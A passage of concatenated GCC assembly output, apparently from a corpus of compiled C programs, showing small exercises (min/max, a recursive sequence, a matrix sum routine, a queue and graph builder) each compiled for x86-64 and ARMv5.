r0, .L4+24 bl printf ldr r0, [fp, #-20] bl __aeabi_i2f mov r3, r0 ldr r1, [fp, #-28] @ float mov r0, r3 bl __aeabi_fmul mov r3, r0 mov r4, r3 ldr r0, [fp, #-20] bl __aeabi_i2f mov r3, r0 ldr r1, [fp, #-24] @ float mov r0, r3 bl __aeabi_fmul mov r3, r0 mov r1, r3 mov r0, r4 bl __aeabi_fsub mov r3, r0 mov r0, r3 bl __aeabi_f2d mov r2, r0 mov r3, r1 ldr r0, .L4+28 bl printf mov r3, #0 ldr r2, .L4 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L3 bl __stack_chk_fail .L3: mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .L5: .align 2 .L4: .word .LC4 .word 1129447424 .word 1105199104 .word .LC0 .word .LC1 .word 1431655766 .word .LC2 .word .LC3 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "301139.c" .intel_syntax noprefix .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "301139.c" .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #0 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "898548.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "Enter a value for no 1 : " .LC1: .string "%d" .LC2: .string "Enter a value for no 2 : " .LC3: .string "%d " .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT lea rax, -16[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT lea rdi, .LC2[rip] mov eax, 0 call printf@PLT lea rax, -12[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT mov edx, DWORD PTR -12[rbp] mov eax, DWORD PTR -16[rbp] mov esi, edx mov edi, eax call minimum mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov edx, DWORD PTR -12[rbp] mov eax, DWORD PTR -16[rbp] mov esi, edx mov edi, eax call maximum mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov edx, DWORD PTR -12[rbp] mov eax, DWORD PTR -16[rbp] mov esi, edx mov edi, eax call multiply mov esi, eax lea rdi, .LC3[rip] mov eax, 0 call printf@PLT mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L3 call __stack_chk_fail@PLT .L3: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .globl minimum .type minimum, @function minimum: .LFB1: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi mov DWORD PTR -8[rbp], esi mov eax, DWORD PTR -4[rbp] cmp eax, DWORD PTR -8[rbp] jge .L5 mov eax, DWORD PTR -4[rbp] jmp .L6 .L5: mov eax, DWORD PTR -8[rbp] .L6: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE1: .size minimum, .-minimum .globl maximum .type maximum, @function maximum: .LFB2: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi mov DWORD PTR -8[rbp], esi mov eax, DWORD PTR -4[rbp] cmp eax, DWORD PTR -8[rbp] jle .L8 mov eax, DWORD PTR -4[rbp] jmp .L9 .L8: mov eax, DWORD PTR -8[rbp] .L9: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE2: .size maximum, .-maximum .globl multiply .type multiply, @function multiply: .LFB3: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi mov DWORD PTR -8[rbp], esi mov eax, DWORD PTR -4[rbp] imul eax, DWORD PTR -8[rbp] pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE3: .size multiply, .-multiply .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "898548.c" .text .section .rodata .align 2 .LC0: .ascii "Enter a value for no 1 : \000" .align 2 .LC1: .ascii "%d\000" .align 2 .LC2: .ascii "Enter a value for no 2 : \000" .align 2 .LC3: .ascii "%d \000" .align 2 .LC4: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 ldr r3, .L4 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r0, .L4+4 bl printf sub r3, fp, #16 mov r1, r3 ldr r0, .L4+8 bl __isoc99_scanf ldr r0, .L4+12 bl printf sub r3, fp, #12 mov r1, r3 ldr r0, .L4+8 bl __isoc99_scanf ldr r3, [fp, #-16] ldr r2, [fp, #-12] mov r1, r2 mov r0, r3 bl minimum mov r3, r0 mov r1, r3 ldr r0, .L4+16 bl printf ldr r3, [fp, #-16] ldr r2, [fp, #-12] mov r1, r2 mov r0, r3 bl maximum mov r3, r0 mov r1, r3 ldr r0, .L4+16 bl printf ldr r3, [fp, #-16] ldr r2, [fp, #-12] mov r1, r2 mov r0, r3 bl multiply mov r3, r0 mov r1, r3 ldr r0, .L4+16 bl printf mov r3, #0 ldr r2, .L4 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L3 bl __stack_chk_fail .L3: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L5: .align 2 .L4: .word .LC4 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .size main, .-main .align 2 .global minimum .syntax unified .arm .fpu softvfp .type minimum, %function minimum: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] str r1, [fp, #-12] ldr r2, [fp, #-8] ldr r3, [fp, #-12] cmp r2, r3 bge .L7 ldr r3, [fp, #-8] b .L8 .L7: ldr r3, [fp, #-12] .L8: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size minimum, .-minimum .align 2 .global maximum .syntax unified .arm .fpu softvfp .type maximum, %function maximum: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] str r1, [fp, #-12] ldr r2, [fp, #-8] ldr r3, [fp, #-12] cmp r2, r3 ble .L10 ldr r3, [fp, #-8] b .L11 .L10: ldr r3, [fp, #-12] .L11: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size maximum, .-maximum .align 2 .global multiply .syntax unified .arm .fpu softvfp .type multiply, %function multiply: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] str r1, [fp, #-12] ldr r3, [fp, #-8] ldr r2, [fp, #-12] mul r3, r2, r3 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size multiply, .-multiply .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "295873.c" .intel_syntax noprefix .text .globl find_nth_term .type find_nth_term, @function find_nth_term: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push rbx sub rsp, 24 .cfi_offset 3, -24 mov DWORD PTR -20[rbp], edi mov DWORD PTR -24[rbp], esi mov DWORD PTR -28[rbp], edx mov DWORD PTR -32[rbp], ecx mov eax, DWORD PTR -20[rbp] cmp eax, DWORD PTR -24[rbp] je .L2 mov eax, DWORD PTR -20[rbp] cmp eax, DWORD PTR -28[rbp] je .L2 mov eax, DWORD PTR -20[rbp] cmp eax, DWORD PTR -32[rbp] jne .L3 .L2: mov eax, DWORD PTR -20[rbp] jmp .L4 .L3: mov eax, DWORD PTR -20[rbp] lea edi, -3[rax] mov ecx, DWORD PTR -32[rbp] mov edx, DWORD PTR -28[rbp] mov eax, DWORD PTR -24[rbp] mov esi, eax call find_nth_term mov ebx, eax mov eax, DWORD PTR -20[rbp] lea edi, -2[rax] mov ecx, DWORD PTR -32[rbp] mov edx, DWORD PTR -28[rbp] mov eax, DWORD PTR -24[rbp] mov esi, eax call find_nth_term add ebx, eax mov eax, DWORD PTR -20[rbp] lea edi, -1[rax] mov ecx, DWORD PTR -32[rbp] mov edx, DWORD PTR -28[rbp] mov eax, DWORD PTR -24[rbp] mov esi, eax call find_nth_term add eax, ebx .L4: mov rbx, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size find_nth_term, .-find_nth_term .section .rodata .LC0: .string "%d %d %d %d" .LC1: .string "%d" .text .globl main .type main, @function main: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rsi, -16[rbp] lea rcx, -20[rbp] lea rdx, -24[rbp] lea rax, -28[rbp] mov r8, rsi mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call __isoc99_scanf@PLT mov ecx, DWORD PTR -16[rbp] mov edx, DWORD PTR -20[rbp] mov esi, DWORD PTR -24[rbp] mov eax, DWORD PTR -28[rbp] mov edi, eax call find_nth_term mov DWORD PTR -12[rbp], eax mov eax, DWORD PTR -12[rbp] mov esi, eax lea rdi, .LC1[rip] mov eax, 0 call printf@PLT mov eax, 0 mov rdi, QWORD PTR -8[rbp] sub rdi, QWORD PTR fs:40 je .L7 call __stack_chk_fail@PLT .L7: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "295873.c" .text .align 2 .global find_nth_term .syntax unified .arm .fpu softvfp .type find_nth_term, %function find_nth_term: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #20 str r0, [fp, #-16] str r1, [fp, #-20] str r2, [fp, #-24] str r3, [fp, #-28] ldr r2, [fp, #-16] ldr r3, [fp, #-20] cmp r2, r3 beq .L2 ldr r2, [fp, #-16] ldr r3, [fp, #-24] cmp r2, r3 beq .L2 ldr r2, [fp, #-16] ldr r3, [fp, #-28] cmp r2, r3 bne .L3 .L2: ldr r3, [fp, #-16] b .L4 .L3: ldr r3, [fp, #-16] sub r0, r3, #3 ldr r3, [fp, #-28] ldr r2, [fp, #-24] ldr r1, [fp, #-20] bl find_nth_term mov r4, r0 ldr r3, [fp, #-16] sub r0, r3, #2 ldr r3, [fp, #-28] ldr r2, [fp, #-24] ldr r1, [fp, #-20] bl find_nth_term mov r3, r0 add r4, r4, r3 ldr r3, [fp, #-16] sub r0, r3, #1 ldr r3, [fp, #-28] ldr r2, [fp, #-24] ldr r1, [fp, #-20] bl find_nth_term mov r3, r0 add r3, r4, r3 .L4: mov r0, r3 sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .size find_nth_term, .-find_nth_term .section .rodata .align 2 .LC0: .ascii "%d %d %d %d\000" .align 2 .LC1: .ascii "%d\000" .align 2 .LC2: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #32 ldr r3, .L8 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 sub r0, fp, #20 sub r2, fp, #24 sub r1, fp, #28 sub r3, fp, #16 str r3, [sp] mov r3, r0 ldr r0, .L8+4 bl __isoc99_scanf ldr r0, [fp, #-28] ldr r1, [fp, #-24] ldr r2, [fp, #-20] ldr r3, [fp, #-16] bl find_nth_term str r0, [fp, #-12] ldr r1, [fp, #-12] ldr r0, .L8+8 bl printf mov r3, #0 ldr r2, .L8 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L7 bl __stack_chk_fail .L7: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L9: .align 2 .L8: .word .LC2 .word .LC0 .word .LC1 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "885957.c" .intel_syntax noprefix .text .globl scilab_rt_datefind_i2i2i0_i2 .type scilab_rt_datefind_i2i2i0_i2, @function scilab_rt_datefind_i2i2i0_i2: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push r15 push r14 push r13 push r12 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 mov DWORD PTR -84[rbp], edi mov DWORD PTR -88[rbp], esi mov QWORD PTR -96[rbp], rdx mov DWORD PTR -100[rbp], ecx mov DWORD PTR -104[rbp], r8d mov QWORD PTR -112[rbp], r9 mov ecx, DWORD PTR -88[rbp] movsx rax, ecx sub rax, 1 mov QWORD PTR -56[rbp], rax movsx rax, ecx mov r14, rax mov r15d, 0 mov edx, DWORD PTR -104[rbp] movsx rax, edx sub rax, 1 mov QWORD PTR -48[rbp], rax movsx rax, edx mov r12, rax mov r13d, 0 mov eax, DWORD PTR 32[rbp] movsx rsi, eax sub rsi, 1 mov QWORD PTR -40[rbp], rsi movsx rsi, eax mov r10, rsi mov r11d, 0 cmp DWORD PTR 16[rbp], 0 je .L15 mov DWORD PTR -60[rbp], 0 jmp .L3 .L6: mov DWORD PTR -64[rbp], 0 jmp .L4 .L5: mov esi, DWORD PTR -60[rbp] movsx rdi, esi movsx rsi, ecx imul rsi, rdi lea rdi, 0[0+rsi*4] mov rsi, QWORD PTR -96[rbp] add rdi, rsi mov esi, DWORD PTR -64[rbp] movsx rsi, esi mov esi, DWORD PTR [rdi+rsi*4] add DWORD PTR -68[rbp], esi add DWORD PTR -64[rbp], 1 .L4: mov esi, DWORD PTR -64[rbp] cmp esi, DWORD PTR -88[rbp] jl .L5 add DWORD PTR -60[rbp], 1 .L3: mov esi, DWORD PTR -60[rbp] cmp esi, DWORD PTR -84[rbp] jl .L6 mov DWORD PTR -60[rbp], 0 jmp .L7 .L10: mov DWORD PTR -64[rbp], 0 jmp .L8 .L9: mov ecx, DWORD PTR -60[rbp] movsx rsi, ecx movsx rcx, edx imul rcx, rsi lea rsi, 0[0+rcx*4] mov rcx, QWORD PTR -112[rbp] add rsi, rcx mov ecx, DWORD PTR -64[rbp] movsx rcx, ecx mov ecx, DWORD PTR [rsi+rcx*4] add DWORD PTR -72[rbp], ecx add DWORD PTR -64[rbp], 1 .L8: mov ecx, DWORD PTR -64[rbp] cmp ecx, DWORD PTR -104[rbp] jl .L9 add DWORD PTR -60[rbp], 1 .L7: mov ecx, DWORD PTR -60[rbp] cmp ecx, DWORD PTR -100[rbp] jl .L10 mov DWORD PTR -60[rbp], 0 jmp .L11 .L14: mov DWORD PTR -64[rbp], 0 jmp .L12 .L13: mov edx, DWORD PTR -60[rbp] movsx rcx, edx movsx rdx, eax imul rdx, rcx lea rcx, 0[0+rdx*4] mov rdx, QWORD PTR 40[rbp] add rcx, rdx mov esi, DWORD PTR -68[rbp] mov edx, DWORD PTR -72[rbp] add esi, edx mov edx, DWORD PTR -64[rbp] movsx rdx, edx mov DWORD PTR [rcx+rdx*4], esi add DWORD PTR -64[rbp], 1 .L12: mov edx, DWORD PTR -64[rbp] cmp edx, DWORD PTR 32[rbp] jl .L13 add DWORD PTR -60[rbp], 1 .L11: mov edx, DWORD PTR -60[rbp] cmp edx, DWORD PTR 24[rbp] jl .L14 .L15: nop pop r12 pop r13 pop r14 pop r15 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size scilab_rt_datefind_i2i2i0_i2, .-scilab_rt_datefind_i2i2i0_i2 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "885957.c" .text .align 2 .global scilab_rt_datefind_i2i2i0_i2 .syntax unified .arm .fpu softvfp .type scilab_rt_datefind_i2i2i0_i2, %function scilab_rt_datefind_i2i2i0_i2: @ args = 24, pretend = 0, frame = 48 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, fp, lr} add fp, sp, #8 sub sp, sp, #52 str r0, [fp, #-48] str r1, [fp, #-52] str r2, [fp, #-56] str r3, [fp, #-60] ldr r4, [fp, #-52] sub r3, r4, #1 str r3, [fp, #-24] mov r3, r4 mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 ldr lr, [fp, #4] sub r3, lr, #1 str r3, [fp, #-20] mov r3, lr mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 ldr ip, [fp, #20] sub r3, ip, #1 str r3, [fp, #-16] mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 ldr r3, [fp, #12] cmp r3, #0 beq .L15 mov r3, #0 str r3, [fp, #-28] b .L3 .L6: mov r3, #0 str r3, [fp, #-32] b .L4 .L5: mov r2, r4 ldr r3, [fp, #-28] mul r3, r2, r3 lsl r3, r3, #2 ldr r2, [fp, #-56] add r3, r2, r3 ldr r2, [fp, #-32] ldr r3, [r3, r2, lsl #2] ldr r2, [fp, #-36] add r3, r2, r3 str r3, [fp, #-36] ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] .L4: ldr r2, [fp, #-32] ldr r3, [fp, #-52] cmp r2, r3 blt .L5 ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L3: ldr r2, [fp, #-28] ldr r3, [fp, #-48] cmp r2, r3 blt .L6 mov r3, #0 str r3, [fp, #-28] b .L7 .L10: mov r3, #0 str r3, [fp, #-32] b .L8 .L9: mov r2, lr ldr r3, [fp, #-28] mul r3, r2, r3 lsl r3, r3, #2 ldr r2, [fp, #8] add r3, r2, r3 ldr r2, [fp, #-32] ldr r3, [r3, r2, lsl #2] ldr r2, [fp, #-40] add r3, r2, r3 str r3, [fp, #-40] ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] .L8: ldr r2, [fp, #-32] ldr r3, [fp, #4] cmp r2, r3 blt .L9 ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L7: ldr r2, [fp, #-28] ldr r3, [fp, #-60] cmp r2, r3 blt .L10 mov r3, #0 str r3, [fp, #-28] b .L11 .L14: mov r3, #0 str r3, [fp, #-32] b .L12 .L13: mov r2, ip ldr r3, [fp, #-28] mul r3, r2, r3 lsl r3, r3, #2 ldr r2, [fp, #24] add r3, r2, r3 ldr r1, [fp, #-36] ldr r2, [fp, #-40] add r1, r1, r2 ldr r2, [fp, #-32] str r1, [r3, r2, lsl #2] ldr r3, [fp, #-32] add r3, r3, #1 str r3, [fp, #-32] .L12: ldr r2, [fp, #-32] ldr r3, [fp, #20] cmp r2, r3 blt .L13 ldr r3, [fp, #-28] add r3, r3, #1 str r3, [fp, #-28] .L11: ldr r2, [fp, #-28] ldr r3, [fp, #16] cmp r2, r3 blt .L14 .L15: nop sub sp, fp, #8 @ sp needed pop {r4, fp, pc} .size scilab_rt_datefind_i2i2i0_i2, .-scilab_rt_datefind_i2i2i0_i2 .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "609340.c" .intel_syntax noprefix .text .globl createQueue .type createQueue, @function createQueue: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov edi, 208 call malloc@PLT mov QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] mov DWORD PTR 200[rax], -1 mov rax, QWORD PTR -8[rbp] mov DWORD PTR 204[rax], -1 mov rax, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size createQueue, .-createQueue .globl isFull .type isFull, @function isFull: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov DWORD PTR 200[rax], 0 mov rax, QWORD PTR -8[rbp] mov eax, DWORD PTR 200[rax] test eax, eax je .L4 mov eax, 1 jmp .L5 .L4: mov eax, 0 .L5: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size isFull, .-isFull .globl isEmpty .type isEmpty, @function isEmpty: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov eax, DWORD PTR 204[rax] cmp eax, -1 jne .L7 mov eax, 1 jmp .L8 .L7: mov eax, 0 .L8: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size isEmpty, .-isEmpty .globl enQueue .type enQueue, @function enQueue: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov DWORD PTR -12[rbp], esi mov rax, QWORD PTR -8[rbp] mov rdi, rax call isFull test eax, eax jne .L13 mov rax, QWORD PTR -8[rbp] mov eax, DWORD PTR 200[rax] cmp eax, -1 jne .L12 mov rax, QWORD PTR -8[rbp] mov DWORD PTR 200[rax], 0 .L12: mov rax, QWORD PTR -8[rbp] mov eax, DWORD PTR 204[rax] lea edx, 1[rax] mov rax, QWORD PTR -8[rbp] mov DWORD PTR 204[rax], edx mov rax, QWORD PTR -8[rbp] mov edx, DWORD PTR 204[rax] mov rax, QWORD PTR -8[rbp] movsx rdx, edx mov ecx, DWORD PTR -12[rbp] mov DWORD PTR [rax+rdx*4], ecx jmp .L9 .L13: nop .L9: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size enQueue, .-enQueue .section .rodata .LC0: .string "Dequeue : %d\n" .text .globl deQueue .type deQueue, @function deQueue: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -4[rbp], 0 mov rax, QWORD PTR -24[rbp] mov rdi, rax call isEmpty test eax, eax je .L15 mov eax, 1 jmp .L16 .L15: mov rax, QWORD PTR -24[rbp] mov edx, DWORD PTR 200[rax] mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR 204[rax] cmp edx, eax jl .L17 mov rax, QWORD PTR -24[rbp] mov DWORD PTR 200[rax], -1 mov rax, QWORD PTR -24[rbp] mov DWORD PTR 204[rax], -1 .L17: mov rax, QWORD PTR -24[rbp] mov edx, DWORD PTR 200[rax] mov rax, QWORD PTR -24[rbp] movsx rdx, edx mov eax, DWORD PTR [rax+rdx*4] mov DWORD PTR -4[rbp], eax mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR 200[rax] lea edx, 1[rax] mov rax, QWORD PTR -24[rbp] mov DWORD PTR 200[rax], edx mov eax, DWORD PTR -4[rbp] mov esi, eax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT mov eax, DWORD PTR -4[rbp] .L16: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size deQueue, .-deQueue .globl makeGraph .type makeGraph, @function makeGraph: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push rbx sub rsp, 40 .cfi_offset 3, -24 mov DWORD PTR -36[rbp], edi mov DWORD PTR -28[rbp], 0 mov eax, DWORD PTR -36[rbp] movsx rdx, eax mov rax, rdx add rax, rax add rax, rdx sal rax, 3 mov rdi, rax call malloc@PLT mov QWORD PTR -24[rbp], rax mov eax, DWORD PTR -36[rbp] cdqe sal rax, 3 mov rdi, rax call malloc@PLT mov rdx, rax mov rax, QWORD PTR -24[rbp] mov QWORD PTR 8[rax], rdx mov eax, DWORD PTR -36[rbp] cdqe sal rax, 2 mov rdi, rax call malloc@PLT mov rdx, rax mov rax, QWORD PTR -24[rbp] mov QWORD PTR 16[rax], rdx mov rax, QWORD PTR -24[rbp] mov edx, DWORD PTR -36[rbp] mov DWORD PTR [rax], edx mov DWORD PTR -28[rbp], 0 jmp .L19 .L20: mov eax, DWORD PTR -36[rbp] cdqe sal rax, 2 mov rdx, QWORD PTR -24[rbp] mov rcx, QWORD PTR 8[rdx] mov edx, DWORD PTR -28[rbp] movsx rdx, edx sal rdx, 3 lea rbx, [rcx+rdx] mov rdi, rax call malloc@PLT mov QWORD PTR [rbx], rax mov eax, DWORD PTR -36[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] mov rcx, QWORD PTR 8[rax] mov eax, DWORD PTR -28[rbp] cdqe sal rax, 3 add rax, rcx mov rax, QWORD PTR [rax] mov esi, 0 mov rdi, rax call memset@PLT mov rax, QWORD PTR -24[rbp] mov rdx, QWORD PTR 16[rax] mov eax, DWORD PTR -28[rbp] cdqe sal rax, 2 add rax, rdx mov DWORD PTR [rax], 0 add DWORD PTR -28[rbp], 1 .L19: mov eax, DWORD PTR -28[rbp] cmp eax, DWORD PTR -36[rbp] jl .L20 mov rax, QWORD PTR -24[rbp] mov rbx, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size makeGraph, .-makeGraph .globl addEdge .type addEdge, @function addEdge: .LFB12: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -8[rbp], rdi mov DWORD PTR -12[rbp], esi mov DWORD PTR -16[rbp], edx mov rax, QWORD PTR -8[rbp] mov rdx, QWORD PTR 8[rax] mov eax, DWORD PTR -12[rbp] cdqe sal rax, 3 add rax, rdx mov rdx, 